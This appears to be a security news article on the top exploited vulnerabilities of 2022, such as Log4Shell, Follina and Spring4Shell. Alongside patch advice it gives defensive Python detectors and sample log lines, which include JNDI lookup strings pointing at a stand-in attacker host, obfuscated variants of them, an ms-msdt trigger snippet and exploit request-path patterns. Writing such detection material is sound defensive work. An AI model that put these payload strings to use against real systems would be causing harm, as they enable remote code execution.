As technology continues to evolve, so too does the cyber-threat landscape. Keeping up with the latest security vulnerabilities is critical for security and technology teams. With the new year just around the corner, let’s look at some of the top security vulnerabilities organizations should be aware of from 2022.
Have a read and check for these vulnerabilities in your environment before they get picked up by threat actors (most were exploited in the wild, so working exploits exist) or by your penetration testing service provider.
Follina MSDT Bug (CVE-2022-30190)
This zero-day flaw was in the Windows ms-msdt: URL protocol handler, which launches the Microsoft Support Diagnostic Tool (MSDT). A crafted Office document that loads an external HTML resource could invoke that handler and run code on the target system, and it worked even with macros turned off completely (the RTF variant even fired from the Explorer preview pane without opening the file). Researchers named the vulnerability 'Follina' after the Italian town whose area code (0438) matched the digits in the malware sample's file name (05-2022-0438.doc).
Workaround
Guess what? The workaround is to remove the registry entry that makes Windows hand ms-msdt: URLs to MSDT: back up the HKEY_CLASSES_ROOT\ms-msdt key, then delete it. Easy-peasy! Microsoft shipped a proper fix in the June 2022 security updates, so install that and only restore the key afterwards if you need the MSDT troubleshooters.
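The document-side check a mail gateway or incident responder would want, as an added example (not code from the original article or from Microsoft): scan a .docx package for externally linked OLE objects, which is how the Follina sample pulled its trigger from a remote HTML file, and count ms-msdt: scheme references in any fetched HTML or RTF text. The sample document is built in memory as a constructed fixture, and the target URL and the SAMPLE_HTML string are placeholders, not the real sample.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship type for OLE objects; an external TargetMode on one of these is the
# pattern the Follina sample used to fetch the ms-msdt: trigger from a remote HTML file.
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# Any reference to the ms-msdt: scheme, whatever the surrounding markup.
MSDT_RE = re.compile(r"ms-msdt\s*:", re.IGNORECASE)


def external_ole_targets(docx_bytes):
    """Return (part, target) pairs for every externally linked OLE object in a .docx."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(z.read(name)):
                if rel.get("Type") == OLE_REL_TYPE and rel.get("TargetMode") == "External":
                    hits.append((name, rel.get("Target")))
    return hits


def count_msdt_references(text):
    """Count ms-msdt: URL scheme references in fetched HTML, RTF or any other text."""
    return len(MSDT_RE.findall(text))


def scan_docx(docx_bytes):
    """Combine both checks: external OLE links plus any ms-msdt: string inside the package."""
    findings = {"external_ole": external_ole_targets(docx_bytes), "msdt_refs": 0}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            findings["msdt_refs"] += count_msdt_references(z.read(name).decode("utf-8", "ignore"))
    return findings


def build_sample_docx(external_target=None):
    """Constructed fixture: a minimal .docx, optionally with one externally linked OLE object."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        rels = ['<?xml version="1.0"?>',
                '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">']
        if external_target:
            rels.append('<Relationship Id="rId5" Type="%s" Target="%s" TargetMode="External"/>'
                        % (OLE_REL_TYPE, external_target))
        rels.append("</Relationships>")
        z.writestr("word/_rels/document.xml.rels", "".join(rels))
    return buf.getvalue()


# Constructed stand-in for the remote HTML a linked object would fetch (not the real sample).
SAMPLE_HTML = '<html><script>window.location.href = "ms-msdt:/id PCWDiagnostic";</script></html>'

if __name__ == "__main__":
    print(scan_docx(build_sample_docx("http://example.invalid/linked.html")))
    print(scan_docx(build_sample_docx()))
    print("ms-msdt references in fetched HTML:", count_msdt_references(SAMPLE_HTML))
```

An external OLE relationship is not malicious on its own, but it is rare in ordinary business documents and is worth quarantining for a second look; the ms-msdt: count is the confirming signal once the linked resource has been retrieved.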
Log4Shell/Log4j (CVE-2021-44228)
This vulnerability from December 2021 ensured a busy start to 2022 for security teams. The zero-day affected Log4j 2 versions from 2.0-beta9 through 2.15.0 (excluding the security releases 2.3.1, 2.12.2 and 2.12.3): the library resolved ${jndi:...} lookups inside logged messages, so an attacker who controls any string that gets logged (a User-Agent header, a login name) could point it at an attacker-controlled LDAP or RMI server and have the application load and execute arbitrary code. That code runs with whatever privileges the affected Java process has, which is often a dedicated service account but on many appliances is root or SYSTEM.
Workaround
Ensure that you have upgraded to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7) or 2.17.1 (for Java 8 and later), or a later 2.x release. Removing the JndiLookup class from log4j-core jars is only a stopgap, and remember that the library is routinely bundled inside vendor appliances and fat jars, so inventory by scanning jars on disk rather than trusting the package manager alone.
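Two checks a practitioner runs during Log4Shell triage, as an added example (not code from the article or from the Apache Log4j project): deciding from a discovered version string whether a jar is in the affected range and which release to move to for a given Java runtime, using the fixed versions the text above lists, and spotting ${jndi:...} probes in access logs even when they are obfuscated with nested ${lower:j} or ${::-j} lookups. The log lines are constructed samples, not real captures.

```python
import re

# Fixed releases per Java branch, as the text above recommends.
FIXED_RELEASE = {6: "2.3.2", 7: "2.12.4", 8: "2.17.1"}

# Log4j 2 version strings: 2.14.1, 2.0-beta9, 2.0-rc2 ...
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z]+\d*))?$")


def parse_version(text):
    """Map a version string to a sortable tuple; a pre-release sorts below its final release.
    (Sufficient for Log4j 2's history, which only has beta1..beta9 and rc1, rc2.)"""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised Log4j version: %r" % text)
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1, pre or "")


AFFECTED_LOW = parse_version("2.0-beta9")
AFFECTED_HIGH = parse_version("2.15.0")
SECURITY_BACKPORTS = {parse_version(v) for v in ("2.3.1", "2.12.2", "2.12.3")}


def affected_by_cve_2021_44228(version):
    """True if this Log4j 2 release is in the affected range (Log4j 1.x has other bugs, not this one)."""
    v = parse_version(version)
    return AFFECTED_LOW <= v <= AFFECTED_HIGH and v not in SECURITY_BACKPORTS


def recommended_upgrade(version, java_major):
    """Return the release to move to for this Java runtime, or None if already at or past it."""
    branch = 6 if java_major <= 6 else 7 if java_major == 7 else 8
    target = FIXED_RELEASE[branch]
    return target if parse_version(version) < parse_version(target) else None


# Obfuscation seen in the wild: ${lower:j}, ${upper:N}, ${::-j} and ${env:NOPE:-j} each resolve
# to a single character, so undo those before looking for the jndi lookup prefix.
SINGLE_CHAR_CASE_RE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([A-Za-z0-9_])\s*\}", re.IGNORECASE)
DEFAULT_VALUE_RE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise_lookups(text, max_rounds=10):
    """Collapse nested lookups until nothing changes (bounded, so hostile input cannot loop forever)."""
    for _ in range(max_rounds):
        new = SINGLE_CHAR_CASE_RE.sub(lambda m: m.group(1), text)
        new = DEFAULT_VALUE_RE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def is_jndi_probe(log_line):
    return JNDI_RE.search(normalise_lookups(log_line)) is not None


# Constructed access-log lines (not real captures): one benign, three probes, one harmless lookup.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:12:07 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:09 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:11 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/x}"',
    '10.0.0.7 - - [10/Dec/2021:10:13:00 +0000] "GET / HTTP/1.1" 200 "-" "${env:USER} test client"',
]


def probe_lines(lines):
    """Indices of the lines that carry a JNDI lookup after de-obfuscation."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]


if __name__ == "__main__":
    for v, java in (("2.14.1", 11), ("2.12.1", 7), ("2.17.1", 17)):
        print(v, "affected:", affected_by_cve_2021_44228(v), "upgrade to:", recommended_upgrade(v, java))
    print("probe lines:", probe_lines(SAMPLE_LOGS))
```

The normalisation step is what separates a useful detector from one that only catches the first-day payload; attackers switched to nested and default-value lookups within hours of the disclosure. Note that a probe in the logs proves an attempt, not a compromise: correlate it with outbound LDAP/RMI connections from the Java host to confirm.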
Spring4Shell/Springshell (CVE-2022-22965)
Spring4Shell affects Spring Framework applications (Spring MVC and Spring WebFlux) running on JDK 9 or later that bind request parameters to Java objects (data binding). A crafted request can reach the class loader through the class.module.classLoader property path; in the exploited configuration (a WAR deployed on Apache Tomcat) this was used to reconfigure Tomcat's access logging and drop a file on disk, giving unauthenticated remote code execution. The issue was exploited in the wild and may still be.
Workaround
This vulnerability was fixed in Spring Framework 5.3.18 and 5.2.20 (Spring Boot 2.6.6 and 2.5.12 pick up the fixed framework). See the Spring team's official early announcement for the affected configurations and the interim mitigation.
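The interim mitigation the Spring team published was an @InitBinder that sets disallowed field patterns on the DataBinder. As an added example (not Spring's own code, and written in Python rather than Java so it runs stand-alone), this reproduces that check over a form-encoded request body so you can see exactly which parameter names it refuses and which it lets through; the SAMPLE_BODY is constructed, with placeholder values rather than the payload.

```python
from urllib.parse import parse_qsl

# The field patterns from the Spring team's published @InitBinder workaround.
DISALLOWED_FIELDS = ("class.*", "Class.*", "*.class.*", "*.Class.*")


def simple_match(pattern, text):
    """Spring-style simpleMatch: '*' is honoured only as a leading and/or trailing wildcard.
    Matching is case-insensitive here (an assumption for safety, so 'CLASS.module' is caught too)."""
    p, t = pattern.lower(), text.lower()
    if p.startswith("*") and p.endswith("*"):
        return p[1:-1] in t
    if p.startswith("*"):
        return t.endswith(p[1:])
    if p.endswith("*"):
        return t.startswith(p[:-1])
    return p == t


def is_disallowed(field, patterns=DISALLOWED_FIELDS):
    return any(simple_match(p, field) for p in patterns)


def bind_request(body, patterns=DISALLOWED_FIELDS):
    """Split a form-encoded body into fields that would be bound and fields the binder refuses."""
    bound, rejected = {}, []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if is_disallowed(name, patterns):
            rejected.append(name)
        else:
            bound[name] = value
    return bound, rejected


# Constructed request body: two ordinary fields plus the class.module.classLoader property path
# that Spring4Shell abuses. The values are placeholders, not the payload.
SAMPLE_BODY = (
    "name=alice&age=30"
    "&class.module.classLoader.resources.context.parent.pipeline.first.pattern=placeholder"
    "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.txt"
)

if __name__ == "__main__":
    bound, rejected = bind_request(SAMPLE_BODY)
    print("bound:", bound)
    print("rejected:", rejected)
```

The case-insensitive matching is deliberate: in Spring Framework before 5.3.19 and 5.2.21 the disallowedFields patterns were case-sensitive (CVE-2022-22968), which is why the workaround lists both class.* and Class.*. Treat the binder rule as a stopgap; the real fix is the framework upgrade.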
BIG-IP iControl REST RCE (CVE-2022-1388)
CVE-2022-1388 is an authentication bypass in the iControl REST interface of affected F5 BIG-IP versions: an unauthenticated attacker who can reach the management port (or a self IP with iControl REST exposed) can execute arbitrary system commands as root and take full control of the appliance. F5 rated it critical (CVSS 9.8) because the interface is often network-facing, the bypass is trivial to exploit, and public exploits appeared within days of the advisory.
Workaround
Apply the fixed releases F5 published on May 4, 2022 (BIG-IP 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6 and 13.1.5; the 11.x and 12.x branches are end of support and were not fixed). Until you can, follow F5's interim mitigations: block iControl REST access through self IPs, restrict management-interface access to trusted networks, or modify the BIG-IP httpd configuration as the advisory describes.
Google Chrome Use After Free in Animation (CVE-2022-0609)
In affected Google Chrome versions (prior to 98.0.4758.102), a remote attacker could exploit a use-after-free in Animation via a crafted HTML page, and Google confirmed that an exploit existed in the wild. A use-after-free is a memory corruption flaw in which a program continues to use a memory address after the associated memory has been freed (deallocated); an attacker who can control what gets allocated in that freed slot can corrupt the object the program still believes is there and hijack control flow.
Workaround
Google released the fix (Chrome 98.0.4758.102) on February 14, 2022, four days after the bug was reported. Make sure Chrome, and the Chromium-based browsers that ship the same engine, are at that version or later.
ProxyNotShell (CVE-2022-41040 and CVE-2022-41082) in Exchange
The first of these two bugs, CVE-2022-41040, is a server-side request forgery (SSRF) in the Autodiscover endpoint. An attacker holding valid credentials for any mailbox can use it to reach the Exchange PowerShell remoting backend and trigger CVE-2022-41082, which yields remote code execution on the server. Both vulnerabilities are part of one attack chain and require an authenticated session (ordinary email user credentials are enough), which is the point of the name: it resembles ProxyShell but without the authentication bypass.
Workaround
Both vulnerabilities were fixed in the November 2022 Exchange Server security updates. Before that, Microsoft's interim mitigation was an IIS URL Rewrite rule blocking the Autodiscover-to-PowerShell request pattern, delivered through the Exchange Emergency Mitigation Service and a standalone script (EOMTv2) for on-premises servers. That rule was bypassed and revised several times, so treat it as a stopgap: apply the security update and disable remote PowerShell for non-administrative users.
Zimbra RCE (CVE-2022-27925 and CVE-2022-41352)
CVE-2022-27925 is a directory traversal in the ZCS mboxImport servlet: a ZIP archive with crafted entry names wrote files outside the intended directory, giving remote code execution. It required an authenticated admin session, but it was chained in the wild with the authentication bypass CVE-2022-37042; the traversal was patched in March 2022 and the bypass in August 2022. CVE-2022-41352 is different in kind: amavisd, Zimbra's content filter, extracts .cpio and .tar attachments with the cpio utility, and cpio's path traversal flaw lets an unauthenticated attacker write files as the zimbra user simply by emailing an attachment. If the pax utility is installed, amavisd prefers it over cpio, and pax is not affected, which is why systems with pax could not be exploited.
Workaround
Follow the Zimbra advisories and mitigation wiki page: install pax on every mailbox server (Ubuntu ships it by default; Red Hat, CentOS and Oracle Linux do not) and restart amavis, then apply the October 2022 patches (9.0.0 Patch 27 and 8.8.15 Patch 34), which remove the cpio dependency altogether. Also confirm the March and August 2022 patches for the mboxImport chain are in place.
Atlassian Confluence Vulnerability (CVE-2022-26134)
This critical unauthenticated OGNL injection affected all supported versions of Confluence Server and Data Center, and it was exploited in the wild to deploy cryptominers and other malware before a fix was available. The injection point is the request URI itself, so exploitation leaves recognisable ${...} expressions in web server logs, and multiple proofs of concept were published on GitHub within a day of the advisory.
Workaround
This bug was fixed in Confluence versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1. See the official security advisory for details, including the interim mitigation of replacing the affected xwork and webwork jars if you cannot upgrade immediately.
ZyXEL Vulnerability (CVE-2022-30525)
Rapid7 identified an unauthenticated remote command injection in the zero-touch provisioning (ZTP) feature of Zyxel firewalls (ATP, VPN and USG FLEX series) running ZLD 5.00 through 5.21 Patch 1. The ZTP handler (/ztp/cgi-bin/handler) passes attacker-supplied fields to a shell command without sanitising them, so an unauthenticated remote attacker can execute arbitrary commands as the nobody user on the device.
Workaround
Zyxel released firmware ZLD V5.30 to fix this issue (the fix shipped in late April 2022, ahead of the public disclosure on May 12). Exploitation attempts were seen within days of disclosure, so do not leave the web management interface or the ZTP endpoint reachable from the internet.
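Four of the bugs above (BIG-IP CVE-2022-1388, ProxyNotShell, Confluence CVE-2022-26134 and Zyxel CVE-2022-30525) arrive as HTTP requests with a recognisable path, which makes a single access-log triage pass worthwhile. As an added example (not code from the article or from any of the vendors), this parses combined-format log lines, URL-decodes the request path, and matches each line against one indicator per CVE; the ProxyNotShell indicator follows the shape of Microsoft's revised URL Rewrite pattern. The log lines are constructed samples, not real captures.

```python
import re
from urllib.parse import unquote

# Combined-format request line: method, path (with query), protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# (cve, required method or None, pattern). Patterns run against the URL-decoded path and query,
# because the Confluence OGNL expression arrives percent-encoded.
INDICATORS = (
    ("CVE-2022-1388",  "POST", re.compile(r"^/mgmt/tm/util/bash", re.IGNORECASE)),
    ("CVE-2022-41040", None,   re.compile(r"(?=.*autodiscover)(?=.*powershell)", re.IGNORECASE)),
    ("CVE-2022-26134", None,   re.compile(r"\$\{")),
    ("CVE-2022-30525", "POST", re.compile(r"^/ztp/cgi-bin/handler", re.IGNORECASE)),
)


def parse_request(line):
    """Return (method, decoded_path) for a log line, or None if it has no request field."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Decode twice so double-encoded payloads (%2524%257B) are normalised as well.
    return m.group("method"), unquote(unquote(m.group("path")))


def triage(lines):
    """Return (line_index, cve, method, decoded_path) for each line that trips an indicator."""
    hits = []
    for i, line in enumerate(lines):
        req = parse_request(line)
        if req is None:
            continue
        method, path = req
        for cve, want_method, rx in INDICATORS:
            if want_method and method != want_method:
                continue
            if rx.search(path):
                hits.append((i, cve, method, path))
    return hits


# Constructed access-log lines (not real captures): one hit per CVE, then two benign requests.
SAMPLE_LOGS = [
    '192.0.2.10 - - [05/May/2022:13:01:22 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 318 "-" "python-requests/2.27.1"',
    '192.0.2.11 - - [03/Oct/2022:09:14:05 +0000] "POST /autodiscover/autodiscover.json?a@example.com/powershell HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [03/Jun/2022:18:22:41 +0000] "GET /%24%7B%28%23a%3D1%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.79.1"',
    '192.0.2.13 - - [12/May/2022:22:40:17 +0000] "POST /ztp/cgi-bin/handler HTTP/1.1" 200 64 "-" "curl/7.79.1"',
    '192.0.2.14 - - [03/Jun/2022:18:23:00 +0000] "GET /display/TEAM/Home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [03/Oct/2022:09:20:00 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 200 4400 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, cve, method, path in triage(SAMPLE_LOGS):
        print("line %d: %s  %s %s" % (idx, cve, method, path))
```

A hit means the request shape was seen, not that it succeeded: for BIG-IP and Zyxel the endpoint alone is already abnormal from an untrusted source, while for Confluence a legitimate page whose title contains ${ would also match, so check the response size and what the server did next before raising an incident.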
A risk-based approach to patch management helps protect organizations against the flaws that malicious actors race to exploit. Ensure that such vulnerabilities are identified during your internal penetration testing exercises and that remediation plans are agreed in advance, so that the window between identification and fix is as short as possible.
These are just a few of the many security vulnerabilities that organizations faced throughout 2022, but they are among the most severe identified this year. "Patch everything" only exists in easy talks and point-and-click scanning reports, not in real networks: prioritise what is internet-facing, unauthenticated and already exploited in the wild.
Source: www.infosecurity-magazine.com